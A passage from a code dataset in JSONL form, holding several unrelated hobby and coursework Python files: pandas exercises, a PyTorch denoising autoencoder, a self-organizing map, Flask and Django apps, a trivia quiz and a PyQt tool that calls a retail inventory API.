readEdgesToSet(dataDir + predFile)\n gold = readEdgesToSet(dataDir + goldFile)\n\n print('edge-based metris: ')\n eval(pred, gold)\n print('ancestor-based metris: ')\n eval(permute(pred), permute(gold))\n\n","repo_name":"dlei/HiExpan","sub_path":"src/HiExpan/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"74178635128","text":"# author: Asmaa ~ 2019\n# Coursera Introduction to data science course\n# WEEK3 Advanced Pandas - Scales, Pivot Table and Dates\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# SCALES\n# create a data farme\n# Nominal Scale\ngrades = pd.DataFrame(['AA', 'BA', 'BB', 'CB', 'CC', 'DC', 'DD', 'FD', 'FF'], index=[\n 'perfect', 'excellent', 'excellent', 'good', 'good', 'ok', 'ok',\n 'failed', 'failed']).rename(columns={0: 'letter'})\n\n\n# convert into Ordinal Scale\nordered_grades = grades['letter'].astype('category', categories=[\n 'FF', 'FD', 'DD', 'DC', 'CC', 'CB', 'BB', 'BA', 'AA'], ordered=True)\n\n# apply boolean masking\ncourse = pd.DataFrame(['FF', 'DC', 'AA'])\nprint(course < 'CC')\n\n\n# PIVOT TABLES\ncars = pd.read_csv('cars.csv')\nprint(cars.shape)\n\n# returns a table has YEAR field (distinct values) as row names and\n# Make field as column names and the values are the average of kW\n# field for corresponding Make and YEAR values (Liked it ^_^)\npivot = cars.pivot_table(values='(kW)', index='YEAR',\n columns='Make', aggfunc=np.mean)\nprint(pivot)\n\n# --------------------------------------------------------\n# DATES\n\n# common functions\n# get time and date\nts = pd.Timestamp('7/11/1998 12:15AM')\nprint(ts)\n\n# get month or day\nm = pd.Period('11/1998')\nd = pd.Period('7/11/1998')\nprint(m, d)\n\n# DateTimeIndex - use dates as indices\ns = pd.Series(['asmaa', 'esma'], [pd.Timestamp(\n '7/11/1998 12AM'), pd.Timestamp('7/11/1998 12PM')])\nprint(s)\n\n\n# date formatting (Liked it :D)\n# in default yyyy-dd-mm\ndates = ['7/11/1998', '26.6.2019', 'June 5 2015']\nprint(pd.to_datetime(dates))\n\n# yyyy-mm-dd\nprint(pd.to_datetime(dates, dayfirst=True))\n\n# Time Deltas (time differences) (LIKED it :p)\ndelta = pd.Timestamp('26/6/2019')-pd.Timestamp('7/11/1998')\nprint(delta)\n\n# date range (start date, number of terms, length of term)\ndr = pd.date_range('28/9/2013', periods=7, freq='2M')\nprint(dr)\n\n# use date range as an index for data frame\ndata = pd.DataFrame({'Num 1': np.random.randint(0, 30, 7).cumsum(),\n 'Num 2': np.random.randint(0, 60, 7)}, index=dr)\n\n\nprint(data)\n\n# querying\nprint(data['2014'])\nprint(data['2014-05'])\n\n\n# change frequency of dates\nprint(data.asfreq('1M', method='ffill'))\n\ndata.plot()\n","repo_name":"asmaamirkhan/AppliedDataScienceSpecialization","sub_path":"1-IntroductionToDataScience/3-ADVANCED-PYTHON-PANDAS/AsmaaAdvancedPandasOtherCocepts.py","file_name":"AsmaaAdvancedPandasOtherCocepts.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8156278346","text":"#!/bin/python3\n# -*- coding: utf-8 -*-\n\nimport json\n\nfrom inno_config import *\nfrom inno_lib import *\n\nif __name__ == '__main__':\n InnoPrintJsonHeader()\n\n cmd = 'uptime'\n statusStr = InnoGetCmdRst(cmd)\n\n cmd = 'free'\n infoStr = InnoGetCmdRst(cmd)\n infoList = infoStr.split('\\n')\n memList = infoList[1].split(' ')\n cacheList = infoList[2].split(' ')\n\n memUsed = int(memList[14])\n 
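# the hard-coded indices below assume the fixed column layout of this device's 'free' output\n    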
memFree = int(memList[19])\n cacheUsed = int(cacheList[7])\n cacheFree = int(cacheList[-1])\n\n #print(infoList)\n #print()\n #print(memList)\n #print(cacheList)\n obj = {\n 'status': statusStr,\n 'memUsed': memUsed,\n 'memFree': memFree,\n 'memTotal': memUsed + memFree,\n\n 'cacheUsed':cacheUsed,\n 'cacheFree':cacheFree,\n 'cacheTotal':cacheUsed + cacheFree\n }\n\n InnoPrintJson(obj)\n\n","repo_name":"aepkolol/innofirmware","sub_path":"home/www/cgi-bin/system.py","file_name":"system.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"70807101370","text":"import numpy as np\nfrom keras.datasets import mnist\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nfrom torchvision import transforms\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader,Dataset\nimport torch\nimport torch.optim as optim\nfrom torch.autograd import Variable\n\n\ndef add_noise(img, noise_type=\"gaussian\"):\n row, col = 28, 28\n img = img.astype(np.float32)\n\n if noise_type == \"gaussian\":\n mean = 0\n var = 10\n sigma = var ** .5\n noise = np.random.normal(-5.9, 5.9, img.shape)\n noise = noise.reshape(row, col)\n img = img + noise\n return img\n\n if noise_type == \"speckle\":\n noise = np.random.randn(row, col)\n noise = noise.reshape(row, col)\n img = img + img * noise\n return img\n\n(xtrain,ytrain),(xtest,ytest)=mnist.load_data()\nprint(\"No of training datapoints:{}\\nNo of Test datapoints:{}\".format(len(xtrain),len(xtest)))\n\n\"\"\"\nFrom here onwards,we split the 60k training datapoints into 3 sets each given one type of each noise.\nWe shuffle them for better generalization.\n\"\"\"\nnoises = [\"gaussian\", \"speckle\"]\nnoise_ct = 0\nnoise_id = 0\ntraindata = np.zeros((60000, 28, 28))\n\nfor idx in tqdm(range(len(xtrain))):\n\n if noise_ct < (len(xtrain) / 2):\n noise_ct += 1\n traindata[idx] = add_noise(xtrain[idx], noise_type=noises[noise_id])\n\n else:\n print(\"\\n{} noise addition completed to images\".format(noises[noise_id]))\n noise_id += 1\n noise_ct = 0\n\nprint(\"\\n{} noise addition completed to images\".format(noises[noise_id]))\n\nnoise_ct = 0\nnoise_id = 0\ntestdata = np.zeros((10000, 28, 28))\n\nfor idx in tqdm(range(len(xtest))):\n\n if noise_ct < (len(xtest) / 2):\n noise_ct += 1\n x = add_noise(xtest[idx], noise_type=noises[noise_id])\n testdata[idx] = x\n\n else:\n print(\"\\n{} noise addition completed to images\".format(noises[noise_id]))\n noise_id += 1\n noise_ct = 0\n\nprint(\"\\n{} noise addition completed to images\".format(noises[noise_id]))\n\n\n\"\"\"\nHere we Try to visualize, each type of noise that was introduced in the images\nAlong with their original versions\n\n\"\"\"\n\nf, axes=plt.subplots(2,2)\n\n#showing images with gaussian noise\naxes[0,0].imshow(xtrain[0],cmap=\"gray\")\naxes[0,0].set_title(\"Original Image\")\naxes[1,0].imshow(traindata[0],cmap='gray')\naxes[1,0].set_title(\"Noised Image\")\n\n#showing images with speckle noise\naxes[0,1].imshow(xtrain[25000],cmap='gray')\naxes[0,1].set_title(\"Original Image\")\naxes[1,1].imshow(traindata[25000],cmap=\"gray\")\naxes[1,1].set_title(\"Noised Image\")\n\n\nclass noisedDataset(Dataset):\n\n def __init__(self, datasetnoised, datasetclean, labels, transform):\n self.noise = datasetnoised\n self.clean = datasetclean\n self.labels = labels\n self.transform = transform\n\n def __len__(self):\n return len(self.noise)\n\n def __getitem__(self, idx):\n xNoise = self.noise[idx]\n xClean = 
self.clean[idx]\n y = self.labels[idx]\n\n if self.transform != None:\n xNoise = self.transform(xNoise)\n xClean = self.transform(xClean)\n\n return (xNoise, xClean, y)\n\ntsfms=transforms.Compose([ transforms.ToTensor()])\n\ntrainset=noisedDataset(traindata,xtrain,ytrain,tsfms)\ntestset=noisedDataset(testdata,xtest,ytest,tsfms)\n\n\n\"\"\"\nHere , we create the trainloaders and testloaders.\nAlso, we transform the images using standard lib functions\n\"\"\"\n\n\nbatch_size=32\n\n\n\ntrainloader=DataLoader(trainset,batch_size=32,shuffle=True)\ntestloader=DataLoader(testset,batch_size=1,shuffle=True)\n\n\"\"\"\nHere, we define the autoencoder model.\n\"\"\"\n\n\nclass denoising_model(nn.Module):\n def __init__(self):\n super(denoising_model, self).__init__()\n self.encoder = nn.Sequential(\n nn.Linear(28 * 28, 256),\n nn.ReLU(True),\n nn.Linear(256, 128),\n nn.ReLU(True),\n nn.Linear(128, 64),\n nn.ReLU(True)\n\n )\n\n self.decoder = nn.Sequential(\n nn.Linear(64, 128),\n nn.ReLU(True),\n nn.Linear(128, 256),\n nn.ReLU(True),\n nn.Linear(256, 28 * 28),\n nn.Sigmoid(),\n )\n\n def forward(self, x):\n x = self.encoder(x)\n x = self.decoder(x)\n\n return x\n\n\n# We check whether cuda is available and choose device accordingly\nif torch.cuda.is_available() == True:\n device = \"cuda:0\"\nelse:\n device = \"cpu\"\n\nmodel = denoising_model().to(device)\ncriterion = nn.MSELoss()\noptimizer = optim.SGD(model.parameters(), lr=0.01, weight_decay=1e-5)\n\nepochs = 120\nl = len(trainloader)\nlosslist = list()\nepochloss = 0\nrunning_loss = 0\nfor epoch in range(epochs):\n\n print(\"Entering Epoch: \", epoch)\n for dirty, clean, label in tqdm((trainloader)):\n dirty = dirty.view(dirty.size(0), -1).type(torch.FloatTensor)\n clean = clean.view(clean.size(0), -1).type(torch.FloatTensor)\n dirty, clean = dirty.to(device), clean.to(device)\n\n # -----------------Forward Pass----------------------\n output = model(dirty)\n loss = criterion(output, clean)\n # -----------------Backward Pass---------------------\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n running_loss += loss.item()\n epochloss += loss.item()\n # -----------------Log-------------------------------\n losslist.append(running_loss / l)\n running_loss = 0\n print(\"======> epoch: {}/{}, Loss:{}\".format(epoch, epochs, loss.item()))\n\nplt.plot(range(len(losslist)),losslist)\n\n\"\"\"Here, we try to visualize some of the results.\n We randomly generate 6 numbers in between 1 and 10k , run them through the model,\n and show the results with comparisons\n\n \"\"\"\n\nf, axes = plt.subplots(6, 3, figsize=(20, 20))\naxes[0, 0].set_title(\"Original Image\")\naxes[0, 1].set_title(\"Dirty Image\")\naxes[0, 2].set_title(\"Cleaned Image\")\n\ntest_imgs = np.random.randint(0, 10000, size=6)\nfor idx in range((6)):\n dirty = testset[test_imgs[idx]][0]\n clean = testset[test_imgs[idx]][1]\n label = testset[test_imgs[idx]][2]\n dirty = dirty.view(dirty.size(0), -1).type(torch.FloatTensor)\n dirty = dirty.to(device)\n output = model(dirty)\n\n output = output.view(1, 28, 28)\n output = output.permute(1, 2, 0).squeeze(2)\n output = output.detach().cpu().numpy()\n\n dirty = dirty.view(1, 28, 28)\n dirty = dirty.permute(1, 2, 0).squeeze(2)\n dirty = dirty.detach().cpu().numpy()\n\n clean = clean.permute(1, 2, 0).squeeze(2)\n clean = clean.detach().cpu().numpy()\n\n axes[idx, 0].imshow(clean, cmap=\"gray\")\n axes[idx, 1].imshow(dirty, cmap=\"gray\")\n axes[idx, 2].imshow(output, 
cmap=\"gray\")","repo_name":"maryamshahpasand/advGAN_pytorch","sub_path":"AE.py","file_name":"AE.py","file_ext":"py","file_size_in_byte":6682,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"72620943609","text":"#!/usr/bin/env python3\nimport os\nimport csv\nimport argparse\nfrom tqdm import tqdm\nimport pandas as pd\nfrom collections import Counter, defaultdict\nfrom examples.speech_to_text.data_utils import(\n load_tsv_to_dicts,\n save_df_to_tsv\n)\nfrom examples.s2s_trans.preprocessing.data_utils import ipa_phonemize\nfrom pypinyin import pinyin\nfrom pypinyin import Style\nfrom examples.s2s_trans.preprocessing.cn_tn import run_cn_tn\nimport tacotron_cleaner\nimport re\ndef pypinyin_g2p_phone(text):\n from pypinyin import pinyin\n from pypinyin import Style\n from pypinyin.style._utils import get_finals\n from pypinyin.style._utils import get_initials\n\n phones = [\n p\n for phone in pinyin(text, style=Style.TONE3)\n for p in [\n get_initials(phone[0], strict=True),\n get_finals(phone[0], strict=True),\n ]\n if len(p) != 0\n ]\n return phones\n# check english character\nen_pattern = re.compile(r'[A-Za-z]',re.S)\n# 去掉标点\nreg = \"[^0-9A-Za-z\\u4e00-\\u9fa5]\"\ndef process(args):\n samples = []\n for e in load_tsv_to_dicts(args.input_file):\n samples.append(e)\n total_nums = len(samples)\n \n manifest_by_split=defaultdict(list)\n for j in tqdm(range(total_nums)):\n res = re.findall(en_pattern,samples[j][\"tgt_text\"])\n if len(res) > 0:\n print(\"find english character at id %s, context is %s\" %(samples[j][\"id\"], samples[j][\"tgt_text\"]))\n continue\n #qprint(\"doing\")\n normalized_src_utt = tacotron_cleaner.cleaners.custom_english_cleaners(samples[j][\"src_text\"])\n #print(normalized_src_utt)\n normalized_src_utt = ipa_phonemize(\n normalized_src_utt , lang=\"en-us\", use_g2p=True\n )\n #print(normalized_src_utt)\n #print(samples[j][\"tgt_text\"])\n normalized_tgt_utt = run_cn_tn(samples[j][\"tgt_text\"].replace(\" \",\"\"))\n normalized_tgt_utt = re.sub(reg, '', normalized_tgt_utt)\n #print(normalized_tgt_utt)\n space_normalized_tgt_utt = \"\"\n for i in range(len(normalized_tgt_utt)):\n if i == len(normalized_tgt_utt) -1:\n space_normalized_tgt_utt = space_normalized_tgt_utt + normalized_tgt_utt[i]\n else:\n space_normalized_tgt_utt = space_normalized_tgt_utt + normalized_tgt_utt[i] + \"|\"\n #print(space_normalized_tgt_utt)\n space_normalized_tgt_utt = (\" \").join(pypinyin_g2p_phone(space_normalized_tgt_utt))\n #print(space_normalized_tgt_utt)\n\n manifest_by_split[\"id\"].append(samples[j][\"id\"])\n manifest_by_split[\"src_audio\"].append(samples[j][\"src_audio\"])\n manifest_by_split[\"src_n_frames\"].append(samples[j][\"src_n_frames\"])\n manifest_by_split[\"src_text\"].append(normalized_src_utt)\n manifest_by_split[\"tgt_audio\"].append(samples[j][\"tgt_audio\"])\n manifest_by_split[\"tgt_n_frames\"].append(samples[j][\"tgt_n_frames\"])\n manifest_by_split[\"tgt_text\"].append(space_normalized_tgt_utt)\n manifest_by_split[\"speaker\"].append(samples[j][\"speaker\"])\n\n save_df_to_tsv(\n pd.DataFrame.from_dict(manifest_by_split),\n args.output_file\n )\n\n\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input-file\", required=True, type=str)\n parser.add_argument(\"--output-file\",required=True, type=str)\n\n\n args = parser.parse_args()\n\n process(args)\n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"fengpeng-yue/speech-to-speech-translation","sub_path":"examples/s2s_trans/preprocessing/g2p.py","file_name":"g2p.py","file_ext":"py","file_size_in_byte":3461,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"77"} +{"seq_id":"2975661257","text":"import codecs\n\ndef loadStudents():\n checkFile()\n for line in codecs.open('studenti.txt', 'r',encoding='utf8').readlines():\n if len(line) > 1:\n stud = str2student(line)\n studenti.append(stud)\n\ndef checkFile():\n if not exists('studenti.txt'):\n codecs.open('studenti.txt', 'w',encoding='utf8').close()\n\ndef saveStudents():\n file = codecs.open('studenti.txt', 'w',encoding='utf8')\n for stud in studenti:\n file.write(student2str(stud))\n file.write('\\n')\n file.close()\n\ndef str2student(line):\n if line[-1] == '\\n':\n line = line[:-1]\n\t# line = line.strip() \n indeks, ime, prezime, roditelj, datum, jmbg, adresa, telefon, email, godina = line.split('|')\n stud = {\n 'indeks': indeks,\n 'ime': ime,\n 'prezime': prezime,\n 'roditelj': roditelj,\n 'datum': datum,\n 'jmbg': jmbg,\n 'adresa': adresa,\n 'telefon': telefon,\n 'email': email,\n 'godina': godina\n }\n return stud\n\ndef student2str(stud):\n return '|'.join([stud['indeks'], stud['ime'], stud['prezime'], \n stud['roditelj'], stud['datum'], stud['jmbg'], stud['adresa'], \n stud['telefon'], stud['email'], stud['godina']])\n","repo_name":"vlaksi/OsnovneRacunarstva-BMI","sub_path":"Predavanja/09 Referentni projekat[2018-19]/Primeri/stuenti_primeri.py","file_name":"stuenti_primeri.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33262317338","text":"# REST API\nfrom django.urls import path, include\n# connects routes to views (controllers) - when i get a request here, execute views\nfrom . import views\n\nurlpatterns = [\n# CHANGED the url for react\n path('pets/', views.PostList.as_view(), name='post_list'), # api/contacts will be routed to the ContactList view for handling\n path('pets//', views.PostDetail.as_view(), name='post_detail'), # api/contacts will be routed to the ContactDetail view for handling\n path('users/', views.UserViewSet.as_view(), name='user_detail'),\n] #","repo_name":"kathleendiep/pet-ventures-api","sub_path":"posts_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35985014294","text":"import random\r\n\r\n\r\n# idea: takes question and answer from an input file, randomly selects one pair\r\n# and puts into a tuple\r\nclass Qanda: # class for questions and answers\r\n string1 = \"qanda created\"\r\n qlist = []\r\n alist = []\r\n score = 0\r\n\r\n def __init__(self):\r\n # when a new object is defined, creates a question and answer stored into 2 lists, along with dummy answers\r\n with open(\"q&a\") as file: #open and read q&a file\r\n counter = 1\r\n for line in file:\r\n if line == \"\":\r\n break\r\n elif counter % 2 == 0: # start at line 1. If line is odd, it is a question. 
If even, it is an answer\r\n                    self.alist.append(line)\r\n                    counter += 1\r\n                else:\r\n                    self.qlist.append(line)\r\n                    counter += 1\r\n\r\n    def printQuestions(self):\r\n        for x in self.qlist:\r\n            print(x)\r\n\r\n    def printAnswers(self):\r\n        for x in self.alist:\r\n            print(x)\r\n\r\n    def runGame(self, questions):\r\n        counter = questions\r\n        used = [] # a list of questions that were already used\r\n        while counter > 0:\r\n            validQuestion = True\r\n            randNum = random.randint(0, (len(self.qlist) - 1)) #random number is between 0 and length of list\r\n            exist_count = used.count(randNum) # check to see if the question has been used\r\n            if exist_count > 0: #if the number is found in the used list\r\n                randNum = random.randint(0, (len(self.qlist) - 1)) # generate a new random number\r\n                validQuestion = False\r\n                exist_count = 0 #reset exist number counter\r\n\r\n            if validQuestion:\r\n                print(\"Question: \" + self.qlist[randNum])\r\n                answers = self.alist[randNum]\r\n                answers = answers.split(\",\") #split answers up into an answer list\r\n                a = answers[0] # first index is the right answer\r\n                b = answers[1]\r\n                c = answers[2]\r\n                d = answers[3]\r\n                print(\"A. \"+a)\r\n                print(\"B. \"+b)\r\n                print(\"C. \"+c)\r\n                print(\"D. \"+d)\r\n                userAnswer = input(\"Answer: \")\r\n                if userAnswer.upper() == \"A\": #as of right now, A is the only correct answer\r\n                    self.score += 1\r\n                    print(\"Correct!\")\r\n                else:\r\n                    print(\"Wrong!\")\r\n\r\n                used.append(randNum)\r\n                counter -= 1\r\n        \r\n        print('\\n', \"Your Final score is: \", self.score, '\\n') \r\n        return self.score\r\n\r\n    \r\n\r\n\r\n\r\n","repo_name":"ChristianC343/triviaGroup","sub_path":"qanda.py","file_name":"qanda.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"41862750442","text":"from django.conf.urls import url\nfrom django.contrib.auth import views as auth_views\nfrom django.contrib.staticfiles.urls import static\nfrom rest_framework.routers import SimpleRouter\n\nfrom backweb import views\nfrom ooohblog.settings import MEDIA_URL, MEDIA_ROOT\n\nrouter = SimpleRouter()\n\n\n\nurlpatterns = [\n    url(r'^login/', views.user_login, name='login'),\n    url(r'^register/', views.register, name='register'),\n    url(r'^my_index/', views.my_index, name='my_index'),\n    url(r'^article/', views.article, name='article'),\n    url(r'^add_article/', views.add_article, name='add_article'),\n    url(r'^article_list/', views.article_list, name='article_list'),\n    url(r'^logout/', auth_views.logout, name='user_logout'),\n    url(r'^del_article/(\\d+)/',views.del_article,name='del_article'),\n    url(r'^edit_article/(?P<id>\\d+)/',views.edit_article,name='edit_article'),\n]\n\nurlpatterns += router.urls\nurlpatterns += static(MEDIA_URL, document_root=MEDIA_ROOT)","repo_name":"crazy-sugar/ooohblog","sub_path":"backweb/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29354632469","text":"# Sort three numbers\nVal_1 = int(input(\"Enter the first value: \"))\nVal_2 = int(input(\"Enter the second value: \"))\nVal_3 = int(input(\"Enter the third value: \"))\n\n\n\n# Get the minimum value\nVal_Min = min(Val_1,Val_2,Val_3)\n\n\n\n# Get the maximum value\nVal_Max = max(Val_1,Val_2,Val_3)\n\n\n\n# Get the middle value\nVal_Inter = (Val_1 + Val_2 + Val_3)-Val_Max-Val_Min\n\n\n\nprint(\"The sorted numbers are: \", format(Val_Min)+ \",\", format(Val_Inter)+\",\", format(Val_Max)) 
","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej6/hito1_ej6_bdb8c16d59c7f3f983601a90352624a6.py","file_name":"hito1_ej6_bdb8c16d59c7f3f983601a90352624a6.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7036770392","text":"from flask import Flask, jsonify, send_from_directory, request\n\n'''\npython3 -m venv env\n\npip install -r requarenments.txt\npip freeze > requarenments.txt\n'''\n\napp = Flask(__name__)\napp.secret_key = b'_5#y2L\"F4Q8z\\n\\xec]/'\n\ndef create_generator_id(id=0):\n while True:\n yield id\n id += 1\n\ngenerator_id = create_generator_id(3)\n \n\ntodoList = [\n {\n \"id\": 1,\n \"task\": \"Make a what todo\",\n \"done\": False\n },\n {\n \"id\": 2,\n \"task\": \"Read todo list\",\n \"done\": True\n }\n]\n\n@app.route('/')\ndef index():\n return send_from_directory('client/public', 'index.html')\n\n\n@app.route('/')\ndef home(path):\n return send_from_directory('client/public', path)\n\n\n@app.route('/todo/', methods=['GET'])\ndef get_todo_list():\n return jsonify(todoList)\n\n\n@app.route('/todo/', methods=['POST'])\ndef create_todo_item():\n data = request.get_json()\n task = {\n 'task': data['task'],\n 'done': False,\n 'id': next(generator_id)\n }\n todoList.append(task)\n return jsonify(task)\n\n\nif __name__ == '__main__':\n app.run(host='127.0.0.1', port=8000, debug=True)\n","repo_name":"fallGamlet/iti_net_tech_cource","sub_path":"flask-app-api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6867426782","text":"import numpy as np\nimport itertools\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\nclass SOM(object):\n def __init__(self,h,w,dim_feat):\n \n self.shape = (h,w,dim_feat)\n self.som = np.zeros((h,w,dim_feat))\n self.L0 = 0.0\n self.lam = 0.0\n self.sigma0 = 0.0\n \n def train(self,data,L0,lam,sigma0,initializer=np.random.rand):\n \n self.L0 = L0\n self.lam = lam\n self.sigma0 = sigma0\n \n self.som = initializer(*self.shape)\n self.data = data\n \n for t in itertools.count():\n \n if self.sigma(t) < 1.0:\n break\n \n i_data = np.random.choice(range(len(data)))\n bmu = self.find_bmu(data[i_data])\n self.update_som(bmu,data[i_data],t)\n \n def update_som(self,bmu,input_vector,t):\n for y in range(self.shape[0]):\n for x in range(self.shape[1]):\n dist_to_bmu = np.linalg.norm((np.array(bmu) - np.array((y,x))))\n self.update_cell((y,x),dist_to_bmu,input_vector,t)\n \n def update_cell(self,cell,dist_to_bmu,input_vector,t):\n \n self.som[cell] += self.N(dist_to_bmu,t)*self.L(t)*(input_vector-self.som[cell])\n \n def N(self,dist_to_bmu,t):\n curr_sigma = self.sigma(t)\n return np.exp(-(dist_to_bmu**2)/(2*curr_sigma**2))\n \n def sigma(self,t):\n return self.sigma0*np.exp(-t/self.lam)\n \n \n def find_bmu(self,input_vec):\n list_bmu = []\n for y in range(self.shape[0]):\n for x in range(self.shape[1]):\n dist = np.linalg.norm((input_vec - self.som[y,x]))\n list_bmu.append(((y,x),dist))\n list_bmu.sort(key = lambda x: x[1])\n \n return list_bmu[0][0]\n \n def update_bmu(self,bmu,input_vector,t):\n self.som[bmu] += self.L(t)*(input_vector-self[bmu])\n \n def L(self,t):\n return self.L0*np.exp(-t/self.lam)\n \n def quant_err(self):\n \"\"\" \n Computes the quantization error of the SOM.\n It uses the data fed at last training.\n \"\"\"\n bmu_dists = []\n for input_vector in self.data:\n bmu = 
self.find_bmu(input_vector)\n            bmu_feat = self.som[bmu]\n            bmu_dists.append(np.linalg.norm(input_vector-bmu_feat))\n        return np.array(bmu_dists).mean()\n    \n    def plot_data(self):\n        for _ in range(3):\n            i_data = np.random.choice(range(len(self.data)))\n            plt.imshow(self.data[i_data], interpolation='nearest')\n            plt.show()\n    \n    def plot_som(self):\n        plt.imshow(self.som, interpolation='nearest')\n        plt.show()\n\ndef main():\n    \"\"\" square_data = np.random.rand(5000,2)\n    som_square = SOM(20,20,2)\n    frames_square = []\n    som_square.train(square_data,L0=0.8,lam=1e2,sigma0=10)\n    print(\"quantization error:\", som_square.quant_err())\"\"\"\n    \n    img=mpimg.imread('NaveeCP.jpg')\n    \n    color_data = np.reshape(img,(26838,3))\n    \n    som_color = SOM(189, 142, 3)\n    som_color.train(color_data,L0=0.8,lam=1e2,sigma0=20)\n    print(\"quantization error:\", som_color.quant_err())\n    som_color.plot_data()\n    som_color.plot_som()\n    \n    \n\nif __name__ == '__main__':\n    main()\n    ","repo_name":"NaveenPoornachandra/ML_AI","sub_path":"SelfOrganizingMap.py","file_name":"SelfOrganizingMap.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34296046681","text":"import sys\nimport json\nimport os.path\nimport logging\nimport constants\nimport settings\nimport saverResolver\nimport loaders\nfrom PyQt5 import uic, QtWidgets, QtCore\nfrom PyQt5.QtWidgets import QApplication, QWidget, QMainWindow, QDialog\nimport datetime\nimport requests\n\n\nclass LogHandler(logging.Handler):\n    def __init__(self, func, level=logging.NOTSET):\n        logging.Handler.__init__(self, level)\n        self.func = func\n\n    def handle(self, record):\n        self.func(self.format(record))\n\n\nclass ConvertService(QMainWindow):\n    def __init__(self):\n        super().__init__()\n        uic.loadUi('mainwindow.ui', self)\n        self.settings_open_button.clicked.connect(self.show_settings)\n        self.version = '1.01'\n        self.initUI()\n        fileName = \"settings.json\"\n        self.appSettings = {}\n        if (os.path.exists(fileName)):\n            with open(fileName, \"r\") as read_file:\n                self.appSettings = json.load(read_file)\n\n        self.start_button.clicked.connect(self.save_xml)\n        self.settingsWindow = settings.Settings(self.appSettings)\n        self.test_button.clicked.connect(self.test)\n        self.delete_button.clicked.connect(self.delete_all)\n\n        FORMAT = '%(asctime)-15s %(message)s'\n        logging.basicConfig(\n            format=FORMAT, filename=\"convertService.log\", level=\"DEBUG\")\n        baseLogger = logging.getLogger('convertService')\n        handler = logging.StreamHandler(sys.stdout)\n        handler.setLevel(logging.DEBUG)\n        formatter = logging.Formatter(\n            '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n        handler.setFormatter(formatter)\n        baseLogger.addHandler(handler)\n        logHandler = LogHandler(self.add_line)\n        logHandler.setFormatter(formatter)\n        baseLogger.addHandler(logHandler)\n        self.logger = baseLogger\n        self.logger.debug('Init')\n    \n    def initUI(self):\n        self.setWindowTitle('Convert service ' + self.version)\n\n    def add_line(self, msg):\n        item = QtWidgets.QListWidgetItem()\n        item.setText(msg)\n        self.logView.addItem(item)\n\n    def delete_all(self):\n        self.logger.debug(\"Evotor api clear all data...\")\n\n        self.headers = {'Content-type': 'application/json', 'x-authorization': self.appSettings[constants.apiKey]}\n        StoreUuid = self.get_store_uuid()\n        self.logger.debug(\"Got store uuid:\"+StoreUuid)\n        url = \"https://api.evotor.ru/api/v1/inventories/stores/\"+StoreUuid+\"/products/delete\"\n\n        requestResult = requests.post(url, 
data=\"[]\", headers=self.headers)\n self.logger.debug(requestResult)\n \n def get_store_uuid(self):\n url = 'https://api.evotor.ru/api/v1/inventories/stores/search'\n response = requests.get(url, headers = self.headers)\n StoreUuid = response.json()[0]['uuid']\n return StoreUuid\n\n def test(self):\n self.logger.debug(\"Evotor api test...\")\n\n self.headers = {'Accept': 'application/vnd.evotor.v2+json',\n 'Content-type': 'application/vnd.evotor.v2+json', 'x-authorization': self.appSettings[constants.apiKey] \n }\n StoreUuid = self.get_store_uuid()\n self.logger.debug(\"Got store uuid:\"+StoreUuid)\n url = \"https://api.evotor.ru/api/v1/inventories/stores/\"+StoreUuid+\"/products\"\n\n requestResult = requests.get(url, headers=self.headers)\n self.logger.debug(requestResult.text)\n\n def show_settings(self):\n self.settingsWindow.refresh(self.appSettings)\n result = self.settingsWindow.exec()\n if (result):\n self.save_settings()\n \n \n def testClose(self, events):\n self.logger.debug('close')\n\n def save_xml(self):\n self.logger.debug('Export started')\n\n try:\n dataLoader = loaders.LoaderResolver(self.appSettings, self.logger).GetLoader()\n model = dataLoader.Load()\n saver = saverResolver.SaverResolver(self.appSettings, model, self.logger).GetSaver()\n saver.save()\n self.appSettings[constants.lastExportTime] = str(datetime.datetime.now())\n self.save_settings()\n self.logger.debug('Export finished')\n except Exception as e:\n self.logger.error('%s' % e) \n\n \n def save_settings(self):\n with open(\"settings.json\", \"w\") as read_file:\n json.dump(self.appSettings, read_file)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = ConvertService()\n ex.show()\n sys.exit(app.exec())\n","repo_name":"sail004/convertService","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} 